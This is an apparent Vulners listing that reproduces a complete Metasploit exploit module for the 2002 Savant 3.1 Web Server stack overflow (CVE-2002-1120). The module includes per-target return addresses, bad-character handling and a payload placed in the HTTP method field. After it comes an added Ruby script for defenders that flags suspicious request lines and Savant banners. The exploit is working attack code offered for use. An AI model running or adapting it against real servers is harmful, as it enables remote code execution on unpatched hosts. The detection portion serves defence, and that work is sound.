Savant 3.1 Web Server Overflow

Published: 03 Oct 2007 12:37:17
Reported by: aushack <[email protected]>
Type: metasploit
Source: www.rapid7.com
33 views

This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether successful or not, so in a default configuration there are only 10 chances. Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended.


Related (Reporter | Title | Published):

cvelist | CVE-2002-1120 | 12 Sep 2002 04:00
packetstorm | Savant 3.1 Web Server Overflow | 26 Nov 2009 00:00
cve | CVE-2002-1120 | 24 Sep 2002 04:00
securityvulns | Foundstone Labs Advisory - Buffer Overflow in Savant Web Server | 11 Sep 2002 00:00
nvd | CVE-2002-1120 | 24 Sep 2002 04:00
exploitdb | Savant Web Server 3.1 - Remote Overflow (Metasploit) | 4 Oct 2010 00:00
canvas | Immunity Canvas: SAVANT | 24 Sep 2002 04:00
openvas | WWW Too Long URL DoS Vulnerability | 23 Jun 2009 00:00
openvas | www too long url | 23 Jun 2009 00:00
nessus | Web Server Long URL Handling Remote Overflow DoS | 22 Jun 1999 00:00

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Savant 3.1 Web Server Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service
        supports a maximum of 10 threads (for a default install). Each exploit attempt
        generally causes a thread to die whether successful or not. Therefore, in a default
        configuration, you only have 10 chances.

        Due to the limited space available for the payload in this exploit module, use of the
        "ord" payloads is recommended.
      },
      'Author'      => [ 'aushack' ],
      'Arch'        => [ ARCH_X86 ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2002-1120' ],
          [ 'OSVDB', '9829' ],
          [ 'BID', '5686' ],
          [ 'EDB', '787' ]
        ],
      'Privileged'  => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'     =>
        {
          'Space'           => 253,
          'BadChars'        => "\x00\x0a\x0d\x25",
          'StackAdjustment' => -3500,
          'Compat'          =>
            {
              'ConnectionType' => '+ws2ord',
            },
        },
      'Platform'    => ['win'],
      'Targets'     =>
        [
          # Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.
          [ 'Universal Savant.exe',           { 'Ret' => 0x00417a96 } ], # p/r Savant.exe
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll
          [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll
          [ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll
          [ 'Windows XP Pro SP2 - English',   { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll
        ],
      'DisclosureDate' => '2002-09-10',
      'DefaultTarget' => 0))
  end

  def check
    info = http_fingerprint # Server banner reported by the HTTP fingerprint helper
    if info && info =~ /Savant\/3\.1/
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end

  def safe_nops(count)
    # We need to find a safe nop combination.
    # Savant will change some chars in the http method type - anything before the "/".
    #
    # For example, "GET /" will remain "GET /", however
    # "\xe0 /" will be modified to "\xc0 /" ...
    # "\xfe /" will be modified to "\xde /" ...
    # "\xff /" will be modified to "\x9f /"
    # The code after the "/" - our payload - is unchanged >=)
    #
    # Savant bad_chars for the nops
    bad_nop_chars = [*(0xe0..0xff)].pack("C*").bytes

    nopsled = make_nops(count) # make_nops includes the payload bad_chars

    # Reject this sled if any byte in it is one Savant would rewrite;
    # the caller then asks for a fresh random sled.
    return false if nopsled.each_byte.any? { |b| bad_nop_chars.include?(b) }

    nopsled
  end


  def exploit
    print_status("Searching for a suitable nopsled...")
    findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
    until findnop
      findnop = safe_nops(24) # If nops are banned, generate a new batch.
    end

    print_status("Found one! Sending exploit.")
    sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
    res = send_request_raw(
      {
        'method'  => sploit,
        'uri'     => '/'
      }, 5)
    if (res)
      print_error('The server responded, that can\'t be good.')
    end

    handler
  end
end
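The module's check() keys on the Server banner, and its request line puts a 24-byte sled where the HTTP method belongs, followed by " /", the payload and the return address. The following is an added example, not part of the Vulners page or of the Metasploit module, showing the defender's side of the same two facts: a banner test equivalent to check(), and a request-line inspector that flags a method token that is either longer than a normal verb or contains bytes outside the RFC 7230 token alphabet. The MAX_METHOD_LEN threshold, the helper names and the sample request lines are all assumptions made here; the last sample has only the shape of the module's request (filler bytes stand in for sled, payload and return address).

```ruby
require 'set'

# Added example (not part of the Vulners page or the Metasploit module):
# defender-side checks that mirror what the module above relies on.

# RFC 7230 "tchar": the only bytes a legitimate HTTP method token may contain.
TCHAR = Set.new(%q{!#$%&'*+-.^_`|~0123456789}.bytes +
                ('A'..'Z').map(&:ord) + ('a'..'z').map(&:ord)).freeze

# Assumed threshold: the longest standard methods (PROPPATCH, MKACTIVITY)
# are 9-10 bytes, so 16 leaves slack without passing a 24-byte sled.
MAX_METHOD_LEN = 16

# Same banner test the module's check() applies to the Server header.
def savant_31_banner?(server_header)
  !(server_header.to_s =~ /Savant\/3\.1/).nil?
end

# Inspect one raw request line (bytes, as read off the wire or from a capture).
# Returns a list of findings; an empty list means the method token looks normal.
def request_line_findings(line)
  raw = line.b                      # work on bytes: the exploit's method field is binary
  method = raw.split(" ", 2).first  # the method is everything before the first space
  return ["empty request line"] if method.nil? || method.empty?

  findings = []
  if method.bytesize > MAX_METHOD_LEN
    findings << "method token is #{method.bytesize} bytes (limit #{MAX_METHOD_LEN})"
  end
  non_token = method.each_byte.reject { |b| TCHAR.include?(b) }
  findings << "#{non_token.size} non-token byte(s) in method" unless non_token.empty?
  findings
end

# Scan a batch of request lines; returns [index, findings] for each suspicious one.
def scan_request_lines(lines)
  lines.each_with_index.each_with_object([]) do |(line, i), out|
    f = request_line_findings(line)
    out << [i, f] unless f.empty?
  end
end

# Constructed sample traffic. The last line has the shape the module builds:
# a 24-byte sled, " /", a 253-byte stand-in for the payload, a 4-byte stand-in
# for the return address, then the " / HTTP/1.0" that send_request_raw appends.
# Filler bytes only; no shellcode or real address is included.
SAMPLE_REQUEST_LINES = [
  "GET / HTTP/1.0",
  "POST /index.html HTTP/1.1",
  "PROPFIND /dav/ HTTP/1.1",
  ([0x90].pack("C") * 24) + " /".b + ("A".b * 253) + [0x41414141].pack("V") + " / HTTP/1.0".b,
].freeze

if __FILE__ == $PROGRAM_NAME
  puts "Savant 3.1 banner? #{savant_31_banner?('Savant/3.1')}"
  scan_request_lines(SAMPLE_REQUEST_LINES).each do |i, findings|
    puts "line #{i}: #{findings.join('; ')}"
  end
end
```

The two checks are deliberately independent: the banner test tells you which hosts are worth patching or retiring, while the request-line test works on any capture regardless of what the server answered (the module itself expects no response at all when the overflow lands). Raising MAX_METHOD_LEN or relaxing the token test would be the first things to revisit if a legitimate client in your environment uses an unusual verb.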

Vulners AI Score: 0.2 (Low risk)
CVSS2: 7.5
EPSS: 0.65046